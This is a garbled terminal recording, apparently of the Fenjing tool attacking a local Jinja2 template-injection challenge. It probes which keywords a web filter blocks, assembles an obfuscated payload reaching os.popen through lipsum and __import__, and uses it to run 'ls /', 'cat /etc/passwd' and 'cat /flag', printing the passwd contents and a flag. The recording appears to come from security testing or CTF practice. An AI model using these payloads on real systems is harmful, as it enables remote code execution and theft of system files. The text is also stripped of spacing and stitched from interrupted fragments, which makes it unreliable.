unc_gen]|Testingdangerouskeyword'eyiiget_flashed_messageseyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiincludeeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii_eyii'INFO:[waf_func_gen]|Testingdangerouskeyword"eyii'eyii"INFO:[waf_func_gen]|Testingdangerouskeyword'eyii%eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii|eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiibaseeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiigetitemeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiioseyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiipopeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiidicteyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii))eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii=eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'iodsenviods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodsposixiods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodsreadiods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodspopeniods'INFO:[waf_func_gen]|Testingdangerouskeyword'iods~iods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodscountiods'INFO:[waf_func_gen]|Testingdangerouskeyword'iods[iods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodsmroiods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodscdiods'INFO:[waf_func_gen]|Testingdangerouskeyword'iodsvalueiods'INFO:[waf_func_gen]|Testingdangerouskeyword'iods9iods'INFO:[waf_func_gen]|Testingdangerouskeyword'zbcoglobalszbco'INFO:[waf_func_gen]|Testingdangerouskeyword'zbcoevalzbco'INFO:[waf_func_gen]|Testingdangerouskeyword'zbco6zbco'INFO:[waf_func_gen]|Testingdangerouskeyword'zbcoflagzbco'INFO:[waf_func_gen]|Testingdangerouskeyword'zbcolipsumzbco'INFO:[waf_func_gen]|Testingdangerouskeyword'zbcoexeczbco'INFO:[waf_func_gen]|Testingdangerouskeyword'378378'INFO:[waf_func_gen]|Testingdangerouskeyword'subclassesforsubclassesfor'INFO:[waf_func_gen]|Testingdangerouskeyword'argindexargindex'INFO:[waf_func_gen]|Testingdangerouskeyword'\\u),)\\u),)'INFO:[waf_func_gen]|Testingdangerouskeyword'systemsubprocesssystemsubprocess'INFO:[waf_func_gen]|Testingdangerouskeyword'attrnotattrnot'INFO:[waf_func_gen]|Testingdangerouskeyword'range2range2'INFO:[waf_func_gen]|Testingdangerouskeyword'0"length0"length'INFO:[waf_func_gen]|Testingdangerouskeyword'namespace7namespace7'INFO:[waf_func_gen]|Testingdangerouskeyword']\\x]\\x'INFO:[waf_func_gen]|Testingdangerouskeyword'chrflashedchrflashed'INFO:[waf_func_gen]|Testingdangerouskeyword'\\config\\config'INFO:[waf_func_gen]|Testingdangerouskeyword'"if"if'INFO:[waf_func_gen]|Testingdangerouskeyword'globalopenglobalopen'INFO:[waf_func_gen]|Testingdangerouskeyword'url_forclassurl_forclass'INFO:[waf_func_gen]|Testingdangerouskeyword'}}builtins}}builtins'INFO:[waf_func_gen]|Testingdangerouskeyword'{{0{{0'INFO:[waf_func_gen]|Testingdangerouskeyword'1515'INFO:[waf_func_gen]|Testingdangerouskeyword'importurlimporturl'INFO:[waf_func_gen]|Testingdangerouskeyword'selfappselfapp'INFO:[waf_func_gen]|Testingdangerouskeyword'requestcatrequestcat'INFO:[waf_func_gen]|Testingdangerouskeyword'init4init4'INFO:[waf_func_gen]|Testingdangerouskeyword'.ord.ord'INFO:[waf_func_gen]|Testingdangerouskeyword'3+3+'INFO:[waf_func_gen]|Testingdangerouskeyword'get_flashed_messagesincludeget_flashed_messagesinclude'INFO:[waf_func_gen]|Testingdangerouskeyword"_'_'"INFO:[waf_func_gen]|Testingdangerouskeyword'%|%|'INFO:[waf_func_gen]|Testingdangerouskeyword'basegetitembasegetitem'INFO:[waf_func_gen]|Testingdangerouskeyword'ospopospop'INFO:[waf_func_gen]|Testingdangerouskeyword'dict))dict))'INFO:[waf_func_gen]|Testingdangerouskeyword'=env=env'INFO:[waf_func_gen]|Testingdangerouskeyword'posixreadposixread'INFO:[waf_func_gen]|Testingdangerouskeyword'popen~popen~'INFO:[waf_func_gen]|Testingdangerouskeyword'count[count['INFO:[waf_func_gen]|Testingdangerouskeyword'mrocdmrocd'INFO:[waf_func_gen]|Testingdangerouskeyword'value9value9'INFO:[waf_func_gen]|Testingdangerouskeyword'globalsevalglobalseval'INFO:[waf_func_gen]|Testingdangerouskeyword'6flag6flag'INFO:[waf_func_gen]|Testingdangerouskeyword'lipsumexeclipsumexec'INFO:[waf_func_gen]|Testingdangerouskeyword'3737'INFO:[waf_func_gen]|Testingdangerouskeyword'88'INFO:[waf_func_gen]|Testingdangerouskeyword'subclassessubclasses'INFO:[waf_func_gen]|Testingdangerouskeyword'forfor'INFO:[waf_func_gen]|Testingdangerouskeyword'argarg'INFO:[waf_func_gen]|Testingdangerouskeyword'indexindex'INFO:[waf_func_gen]|Testingdangerouskeyword'\\u\\u'INFO:[waf_func_gen]|Testingdangerouskeyword'),)),)'INFO:[waf_func_gen]|Testingdangerouskeyword'systemsystem'INFO:[waf_func_gen]|Testingdangerouskeyword'subprocesssubprocess'INFO:[waf_func_gen]|Testingdangerouskeyword'attrattr'INFO:[waf_func_gen]|Testingdangerouskeyword'notnot'INFO:[waf_func_gen]|Testingdangerouskeyword'rangerange'INFO:[waf_func_gen]|Testingdangerouskeyword'22'INFO:[waf_func_gen]|Testingdangerouskeyword'0"0"'INFO:[waf_func_gen]|Testingdangerouskeyword'lengthlength'INFO:[waf_func_gen]|Testingdangerouskeyword'namespacenamespace'INFO:[waf_func_gen]|Testingdangerouskeyword'77'INFO:[waf_func_gen]|Testingdangerouskeyword']]'INFO:[waf_func_gen]|Testingdangerouskeyword'\\x\\x'INFO:[waf_func_gen]|Testingdangerouskeyword'chrchr'INFO:[waf_func_gen]|Testingdangerouskeyword'flashedflashed'INFO:[waf_func_gen]|Testingdangerouskeyword'\\\\'INFO:[waf_func_gen]|Testingdangerouskeyword'configconfig'INFO:[waf_func_gen]|Testingdangerouskeyword'""'INFO:[waf_func_gen]|Testingdangerouskeyword'ifif'INFO:[waf_func_gen]|Testingdangerouskeyword'globalglobal'INFO:[waf_func_gen]|Testingdangerouskeyword'openopen'INFO:[waf_func_gen]|Testingdangerouskeyword'url_forurl_for'INFO:[waf_func_gen]|Testingdangerouskeyword'classclass'INFO:[waf_func_gen]|Testingdangerouskeyword'}}}}'INFO:[waf_func_gen]|Testingdangerouskeyword'builtinsbuiltins'INFO:[waf_func_gen]|Testingdangerouskeyword'{{{{'INFO:[waf_func_gen]|Testingdangerouskeyword'00'INFO:[waf_func_gen]|Testingdangerouskeyword'11'INFO:[waf_func_gen]|Testingdangerouskeyword'55'INFO:[waf_func_gen]|Testingdangerouskeyword'importimport'INFO:[waf_func_gen]|Testingdangerouskeyword'urlurl'INFO:[waf_func_gen]|Testingdangerouskeyword'selfself'INFO:[waf_func_gen]|Testingdangerouskeyword'appapp'INFO:[waf_func_gen]|Testingdangerouskeyword'requestrequest'INFO:[waf_func_gen]|Testingdangerouskeyword'catcat'INFO:[waf_func_gen]|Testingdangerouskeyword'initinit'INFO:[waf_func_gen]|Testingdangerouskeyword'44'INFO:[waf_func_gen]|Testingdangerouskeyword'..'INFO:[waf_func_gen]|Testingdangerouskeyword'ordord'INFO:[waf_func_gen]|Testingdangerouskeyword'33'INFO:[waf_func_gen]|Testingdangerouskeyword'++'INFO:[waf_func_gen]|Testingdangerouskeyword'get_flashed_messagesget_flashed_messages'INFO:[waf_func_gen]|Testingdangerouskeyword'includeinclude'INFO:[waf_func_gen]|Testingdangerouskeyword'__'INFO:[waf_func_gen]|Testingdangerouskeyword"''"INFO:[waf_func_gen]|Testingdangerouskeyword'%%'INFO:[waf_func_gen]|Testingdangerouskeyword'||'INFO:[waf_func_gen]|Testingdangerouskeyword'basebase'INFO:[waf_func_gen]|Testingdangerouskeyword'getitemgetitem'INFO:[waf_func_gen]|Testingdangerouskeyword'osos'INFO:[waf_func_gen]|Testingdangerouskeyword'poppop'INFO:[waf_func_gen]|Testingdangerouskeyword'dictdict'INFO:[waf_func_gen]|Testingdangerouskeyword'))))'INFO:[waf_func_gen]|Testingdangerouskeyword'=='INFO:[waf_func_gen]|Testingdangerouskeyword'envenv'INFO:[waf_func_gen]|Testingdangerouskeyword'posixposix'INFO:[waf_func_gen]|Testingdangerouskeyword'readread'INFO:[waf_func_gen]|Testingdangerouskeyword'popenpopen'INFO:[waf_func_gen]|Testingdangerouskeyword'~~'INFO:[waf_func_gen]|Testingdangerouskeyword'countcount'INFO:[waf_func_gen]|Testingdangerouskeyword'[['INFO:[waf_func_gen]|Testingdangerouskeyword'mromro'INFO:[waf_func_gen]|Testingdangerouskeyword'cdcd'INFO:[waf_func_gen]|Testingdangerouskeyword'valuevalue'INFO:[waf_func_gen]|Testingdangerouskeyword'99'INFO:[waf_func_gen]|Testingdangerouskeyword'globalsglobals'INFO:[waf_func_gen]|Testingdangerouskeyword'evaleval'INFO:[waf_func_gen]|Testingdangerouskeyword'66'INFO:[waf_func_gen]|Testingdangerouskeyword'flagflag'INFO:[waf_func_gen]|Testingdangerouskeyword'lipsumlipsum'INFO:[waf_func_gen]|Testingdangerouskeyword'execexec'INFO:[waf_func_gen]|Testinglongpayloads...INFO:[full_payload_gen]|use{{PAYLOAD}}INFO:[full_payload_gen]|Addingsomestringvariables...INFO:[payload_gen]|failedgeneratingvariable_of('__add__'),itmightnotbeanissue.INFO:[payload_gen]|Great,string('%c')canbe(prrc,dict(c=x)|join)|joinINFO:[full_payload_gen]|Adding'%c'with{%setfa=(prrc,dict(c=x)|join)|join%}INFO:[payload_gen]|failedgeneratingstring_concatmany([('expression',10,[('literal','dict(__=x)|join')])]),itmightnotbeanissue.INFO:[payload_gen]|failedgeneratingvariable_of('__globals__'),itmightnotbeanissue.INFO:[payload_gen]|failedgeneratingvariable_of('__mul__'),itmightnotbeaINFO:[payload_gen]|Great,string('__')canbex|center(2)|replace(x|center|first,fa)%(95,95)INFO:[full_payload_gen]|Adding'__'with{%setci=x|center(2)|replace(x|center|first,fa)%(95,95)%}INFO:[payload_gen]|Great,string('class')canbedict(CLASS=x)|first|lowerINFO:[full_payload_gen]|Adding'class'with{%setcl=dict(CLASS=x)|first|lower%}INFO:[payload_gen]|Great,string('globals')canbedict(GLOBALS=x)|first|lowerINFO:[full_payload_gen]|Adding'globals'with{%setgl=dict(GLOBALS=x)|first|lower%}INFO:[payload_gen]|Great,string('init')canbedict(INIT=x)|first|lowerINFO:[full_payload_gen]|Adding'init'with{%setin=dict(INIT=x)|first|lower%}INFO:[payload_gen]|Great,string('dict')canbedict(DICT=x)|first|lowerINFO:[full_payload_gen]|Adding'dict'with{%setdi=dict(DICT=x)|first|lower%}INFO:[payload_gen]|Great,string('builtins')canbedict(BUILTINS=x)|first|lowerINFO:[full_payload_gen]|Adding'builtins'with{%setbu=dict(BUILTINS=x)|first|lower%}INFO:[payload_gen]|Great,string('getitem')canbedict(GETITEM=x)|first|lowerINFO:[full_payload_gen]|Adding'getitem'with{%setge=dict(GETITEM=x)|first|lINFO:[payload_gen]|Great,string('import')canbedict(IMPORT=x)|first|lowerINFO:[full_payload_gen]|Adding'import'with{%setim=dict(IMPORT=x)|first|lower%}INFO:[payload_gen]|Great,string('add')canbedict(ADD=x)|first|lowerINFO:[full_payload_gen]|Adding'add'with{%setad=dict(ADD=x)|first|lower%}INFO:[payload_gen]|Great,string('mul')canbedict(MUL=x)|first|lowerINFO:[full_payload_gen]|Adding'mul'with{%setmu=dict(MUL=x)|first|lower%}INFO:[payload_gen]|Great,string('mod')canbedict(MOD=x)|first|lowerINFO:[full_payload_gen]|Adding'mod'with{%setmo=dict(MOD=x)|first|lower%}INFO:[payload_gen]|Great,string('os')canbedict(OS=x)|first|lowerINFO:[full_payload_gen]|Adding'os'with{%setjm=dict(OS=x)|first|lower%}INFO:[payload_gen]|Great,string('popen')canbedict(POPEN=x)|first|lowerINFO:[full_payload_gen]|Adding'popen'with{%setpo=dict(POPEN=x)|first|lowerINFO:[payload_gen]|Great,string('read')canbedict(READ=x)|first|lowerINFO:[full_payload_gen]|Adding'read'with{%setre=dict(READ=x)|first|lower%}INFO:[payload_gen]|Great,string('pop')canbedict(POP=x)|first|lowerINFO:[full_payload_gen]|Adding'pop'with{%setfh=dict(POP=x)|first|lower%}INFO:[payload_gen]|Great,string('get')canbedict(GET=x)|first|lowerINFO:[full_payload_gen]|Adding'get'with{%setgt=dict(GET=x)|first|lower%}INFO:[payload_gen]|Great,string('eval')canbedict(EVAL=x)|first|lowerINFO:[full_payload_gen]|Adding'eval'with{%setev=dict(EVAL=x)|first|lower%}INFO:[payload_gen]|Great,string('bytes')canbedict(BYTES=x)|first|lowerINFO:[full_payload_gen]|Adding'bytes'with{%setby=dict(BYTES=x)|first|lowerINFO:[payload_gen]|Great,string('decode')canbedict(DECODE=x)|first|lowerINFO:[full_payload_gen]|Adding'decode'with{%setde=dict(DECODE=x)|first|lowINFO:[payload_gen]|Great,string('chr')canbedict(CHR=x)|first|lowerINFO:[full_payload_gen]|Adding'chr'with{%setch=dict(CHR=x)|first|lower%}INFO:[payload_gen]|Great,string('truediv')canbedict(TRUEDIV=x)|first|lowerINFO:[full_payload_gen]|Adding'truediv'with{%settr=dict(TRUEDIV=x)|first|lINFO:[payload_gen]|failedgeneratingstring_concatmany([('multiply',('string_underline',),('integer',2)),('string','class'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('class')canbeclINFO:[payload_gen]|Great,string('__class__')canbe(ndll,ndll,cl,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__class__'with{%setca=(ndll,ndll,cl,ndll,ndll)|join%}underline',),('integer',2)),('string','globals'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('globals')canbeglINFO:[payload_gen]|Great,string('__globals__')canbe(ndll,ndll,gl,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__globals__'with{%setgo=(ndll,ndll,gl,ndll,ndll)|join%}underline',),('integer',2)),('string','init'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('init')canbeinINFO:[payload_gen]|Great,string('__init__')canbe(ndll,ndll,in,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__init__'with{%setii=(ndll,ndll,in,ndll,ndll)|join%}underline',),('integer',2)),('string','dict'),('multiply',('string_underliINFO:[payload_gen]|Great,string('dict')canbediINFO:[payload_gen]|Great,string('__dict__')canbe(ndll,ndll,di,ndll,ndll)|jINFO:[full_payload_gen]|Adding'__dict__'with{%setdc=(ndll,ndll,di,ndll,ndlunderline',),('integer',2)),('string','builtins'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('builtins')canbebuINFO:[payload_gen]|Great,string('__builtins__')canbe(ndll,ndll,bu,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__builtins__'with{%setbi=(ndll,ndll,bu,ndll,ndll)|join%}underline',),('integer',2)),('string','getitem'),('multiply',('string_undeINFO:[payload_gen]|Great,string('getitem')canbegeINFO:[payload_gen]|Great,string('__getitem__')canbe(ndll,ndll,ge,ndll,ndllINFO:[full_payload_gen]|Adding'__getitem__'with{%setgi=(ndll,ndll,ge,ndll,underline',),('integer',2)),('string','import'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('import')canbeimINFO:[payload_gen]|Great,string('__import__')canbe(ndll,ndll,im,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__import__'with{%setip=(ndll,ndll,im,ndll,ndll)|join%}underline',),('integer',2)),('string','add'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('add')canbeadINFO:[payload_gen]|Great,string('__add__')canbe(ndll,ndll,ad,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__add__'with{%setcq=(ndll,ndll,ad,ndll,ndll)|join%}underline',),('integer',2)),('string','mul'),('multiply',('string_underlinINFO:[payload_gen]|Great,string('mul')canbemuINFO:[payload_gen]|failedgeneratingenclose(('string_concat',('string_underline',),('string_underline',))),itmightnotbeanissue.INFO:[payload_gen]|failedgeneratingenclose(('string_concat',('string_concat',('string_underline',),('string_underline',)),('string','mul'))),itmightnotbeanissue.',('string_concat',('string_underline',),('string_underline',)),('string','mul')),('string_underline',))),itmightnotbeanissue.INFO:[payload_gen]|Great,string('__mul__')canbendll|attr(cq)(ndll)|attr(cq)(mu)|attr(cq)(ndll)|attr(cq)(ndll)INFO:[full_payload_gen]|Adding'__mul__'with{%setml=ndll|attr(cq)(ndll)|attr(cq)(mu)|attr(cq)(ndll)|attr(cq)(ndll)%}INFO:[payload_gen]|Great,string('mod')canbemoINFO:[payload_gen]|failedgeneratingenclose(('multiply',('string_underline',),('integer',2))),itmightnotbeanissue.INFO:[payload_gen]|failedgeneratingenclose(('string_concat',('multiply',('string_underline',),('integer',2)),('string','mod'))),itmightnotbeanissue.underline',),('integer',2)),('string','mod'),('multiply',('string_underlin',('string_underline',),('string_underline',)),('string','mod'))),itmightmod')),('string_underline',))),itmightnotbeanissue.INFO:[payload_gen]|Great,string('__mod__')canbendll|attr(cq)(ndll)|attr(cq)(mo)|attr(cq)(ndll)|attr(cq)(ndll)INFO:[full_payload_gen]|Adding'__mod__'with{%setmd=ndll|attr(cq)(ndll)|attr(cq)(mo)|attr(cq)(ndll)|attr(cq)(ndll)%}INFO:[payload_gen]|Great,string('truediv')canbetrstring_underline',),('integer',2)),('string','truediv'))),itmightnotbeaunderline',),('integer',2)),('string','truediv'),('multiply',('string_unde',('string_underline',),('string_underline',)),('string','truediv'))),itmightnotbeanissue.truediv')),('string_underline',))),itmightnotbeanissue.INFO:[payload_gen]|Great,string('__truediv__')canbendll|attr(cq)(ndll)|attr(cq)(tr)|attr(cq)(ndll)|attr(cq)(ndll)INFO:[full_payload_gen]|Adding'__truediv__'with{%settu=ndll|attr(cq)(ndll)|attr(cq)(tr)|attr(cq)(ndll)|attr(cq)(ndll)%}INFO:[payload_gen]|Great,string('%c')canbefaINFO:[full_payload_gen]|Adding'%c'with{%setjs=fa%}INFO:[payload_gen]|Great,integer(101)canbe1٠١INFO:[payload_gen]|Great,integer(99)canbeINFO:[payload_gen]|Great,integer(104)canbe1٠٤INFO:[payload_gen]|Great,integer(102)canbe1٠٢INFO:[payload_gen]|Great,integer(51)canbeINFO:[payload_gen]|Great,integer(110)canbe1١٠INFO:[payload_gen]|Great,integer(106)canbe1٠٦INFO:[payload_gen]|Great,integer(49)canbeINFO:[payload_gen]|Great,integer(103)canbe1٠٣INFO:[payload_gen]|Great,integer(59)canbeINFO:[payload_gen]|Great,string('echof3nj1ng;')canbelipsum|attr(go)|attr(gi)(bi)|attr(gi)(by)((1٠١,9٩,1٠٤,111,32,1٠٢,5١,1١٠,32,32,1٠٦,4٩,1١٠,1٠٣,5٩),)|attr(de)()INFO:[full_payload_gen]|Adding'echof3nj1ng;'with{%setec=lipsum|attr(go)|attr(gi)(bi)|attr(gi)(by)((1٠١,9٩,1٠٤,111,32,1٠٢,5١,1١٠,32,32,1٠٦,4٩,1١٠,1٠٣,5٩),)|attr(de)()%}INFO:[full_payload_gen]|Startgeneratingfinalexpression...INFO:[payload_gen]|Great,string('__globals__')canbegoINFO:[payload_gen]|failedgeneratingenclose(('attribute',('jinja_context_var','lipsum'),'__globals__')),itmightnotbeanissue.INFO:[payload_gen]|Great,string('__getitem__')canbegiINFO:[payload_gen]|Great,string('__builtins__')canbebiINFO:[payload_gen]|failedgeneratingenclose(('item',('attribute',('jinja_context_var','lipsum'),'__globals__'),'__builtins__')),itmightnotbeanissue.INFO:[payload_gen]|Great,string('__import__')canbeipINFO:[payload_gen]|Great,string('os')canbejmINFO:[payload_gen]|Great,wegeneratemodule_os()INFO:[payload_gen]|Great,string('popen')canbepoINFO:[payload_gen]|Great,string('echof3nj1ng;')canbeecINFO:[payload_gen]|Great,wegenerateos_popen_obj('echof3nj1ng;')INFO:[payload_gen]|Great,string('read')canbereINFO:[payload_gen]|Great,wegenerateos_popen_read('echof3nj1ng;')INFO:[cracker]|Testinggeneratedpayload.INFO:[cracker]|Success!Nowwecangeneratepayloads.Example/示例:$>>ls/$>>@eval1+2+3+100000$>>@get-configType@helpforfullhelp/输入@help获得完整帮助$>>$>>ls$>>ls/INFO:[payload_gen]|Great,integer(108)canbe1٠٨INFO:[payload_gen]|Great,integer(47)canbeINFO:[payload_gen]|Great,string('ls/')canbelipsum|attr(go)|attr(gi)(bi)|attr(gi)(by)((1٠٨,115,32,4٧),)|attr(de)()INFO:[payload_gen]|Great,wegenerateos_popen_obj('ls/')INFO:[payload_gen]|Great,wegenerateos_popen_read('ls/')INFO:[cli]|Submitpayload{%setjm=dict(OS=x)|first|lower%}{%setpo=dict(POPEN=x)|first|lower%}{%setby=dict(BYTES=x)|first|lower%}{%setde=dict(DECODE=x)|first|lower%}{%setre=dict(READ=x)|first|lower%}{%setndll={}|select()|trim|list|batch(25)|first|last%}{%setgl=dict(GLOBALS=x)|first|lower%}{%setgo=(ndll,ndll,gl,ndll,ndll)|join%}{%setge=dict(GETITEM=x)|first|lower%}{%setgi=(ndll,ndll,ge,ndll,ndll)|join%}{%setbu=dict(BUILTINS=x)|first|lower%}{%setbi=(ndll,ndll,bu,ndll,ndll)|join%}{%setim=dict(IMPORT=x)|first|lower%}{%setip=(ndll,ndll,im,ndll,ndll)|join%}{{lipsum|attr(go)|attr(gi)(bi)|attr(gi)(ip)(jm)|attr(po)(lipsum|attrbinbootdevetcflaghomeliblib64lost+foundmediamntoptprocrootrunsbinsrvsystmpusrvar$>>c$>>ca$>>cat$>>cat/$>>cat/etc/passwdINFO:[payload_gen]|Great,integer(100)canbe1٠٠INFO:[payload_gen]|Great,string('cat/etc/passwd')canbelipsum|attr(go)|attr(gi)(bi)|attr(gi)(by)((9٩,97,116,32,4٧,1٠١,116,9٩,4٧,112,97,115,115,119,1٠٠),)|INFO:[payload_gen]|Great,wegenerateos_popen_obj('cat/etc/passwd')INFO:[payload_gen]|Great,wegenerateos_popen_read('cat/etc/passwd')saslauth:x:990:76:Saslauthduser:/run/saslauthd:/sbin/nologinrpcuser:x:29:29:RPCServiceUser:/var/lib/nfs:/sbin/nologinopenvpn:x:989:988:OpenVPN:/etc/openvpn:/sbin/nologinnm-openvpn:x:988:987:DefaultuserforrunningopenvpnspawnedbyNetworkManager:/:/sbin/nologinunbound:x:987:986:UnboundDNSresolver:/var/lib/unbound:/sbin/nologinabrt:x:173:173::/etc/abrt:/sbin/nologinflatpak:x:986:984:Flatpaksystemhelper:/:/usr/sbin/nologingdm:x:42:42:GNOMEDisplayManager:/var/lib/gdm:/usr/sbin/nologingnome-initial-setup:x:985:983::/run/gnome-initial-setup/:/sbin/nologinvboxadd:x:984:1::/var/run/vboxadd:/sbin/nologinsshd:x:74:74:Privilege-separatedSSH:/usr/share/empty.sshd:/usr/sbin/nologintcpdump:x:72:72:tcpdump:/:/usr/sbin/nologinsystemd-coredump:x:978:978:systemdCoreDumper:/:/usr/sbin/nologinsystemd-timesync:x:977:977:systemdTimeSynchronization:/:/usr/sbin/nologincube:x:1000:1000:cube:/home/cube:/usr/bin/zshclash:x:976:976::/home/clash:/bin/bashakmods:x:975:975:Userisusedbyakmodstobuildakmodpackages:/var/cache/akmods/:/sbin/nologincaddy:x:974:970:Caddywebserver:/var/lib/caddy:/sbin/nologinnginx:x:973:969:Nginxwebserver:/var/lib/nginx:/sbin/nologin$>>cat/flagINFO:[payload_gen]|Great,string('cat/flag')canbelipsum|attr(go)|attr(gi)(bi)|attr(gi)(by)((9٩,97,116,32,4٧,1٠٢,1٠٨,97,1٠٣),)|attr(de)()INFO:[payload_gen]|Great,wegenerateos_popen_obj('cat/flag')INFO:[payload_gen]|Great,wegenerateos_popen_read('cat/flag')(go)|attr(gi)(bi)|attr(gi)(by)((9٩,97,116,32,4٧,1٠٢,1٠٨,97,1٠٣),)|attr(de)(),)|attr(re)()}}klf不会连这都绕不过去吧~你好!FLAG{SUCCESS!Y0U_M4DE_1T!}win.html$>>Bye!Fenjinggit:(dev)pFenjinggit:(dev)pyFenjinggit:(dev)pytFenjinggit:(dev)pythFenjinggit:(dev)pythoFenjinggit:(dev)python-Fenjinggit:(dev)python-mfFenjinggit:(dev)python-mfeFenjinggit:(dev)python-mfenFenjinggit:(dev)python-mfenjFenjinggit:(dev)python-mfenjiFenjinggit:(dev)python-mfenjinFenjinggit:(dev)python-mfenjingsFenjinggit:(dev)python-mfenjingscFenjinggit:(dev)python-mfenjingscaFenjinggit:(dev)python-mfenjingscan-Fenjinggit:(dev)python-mfenjingscan--Fenjinggit:(dev)python-mfenjingscan--uFenjinggit:(dev)python-mfenjingscan--urFenjinggit:(dev)python-mfenjingscan--url'Fenjinggit:(dev)python-mfenjingscan--url'http://127.0.0.1:7888/secr3tttttt'-ttt'--ttt'--ittt'--inttt'--intttt'--intettt'--interttt'--intervttt'--intervattt'--interval0ttt'--interval0.ttt'--interval0.0$>>l(go)|attr(gi)(bi)|attr(gi)(by)((1٠٨,115,32,4٧),)|attr(de)(),)|attr(re)()}}$>>cat/e$>>cat/et$>>cat/etc$>>cat/etc/$>>cat/etc/p$>>cat/etc/pa$>>cat/etc/pas$>>cat/etc/pass$>>cat/etc/passw(go)|attr(gi)(bi)|attr(gi)(by)((9٩,97,116,32,4٧,1٠١,116,9٩,4٧,112,97,115,115,119,1٠٠),)|attr(de)(),)|attr(re)()}}$>>cat/f$>>cat/fl$>>cat/fla \ No newline at end of file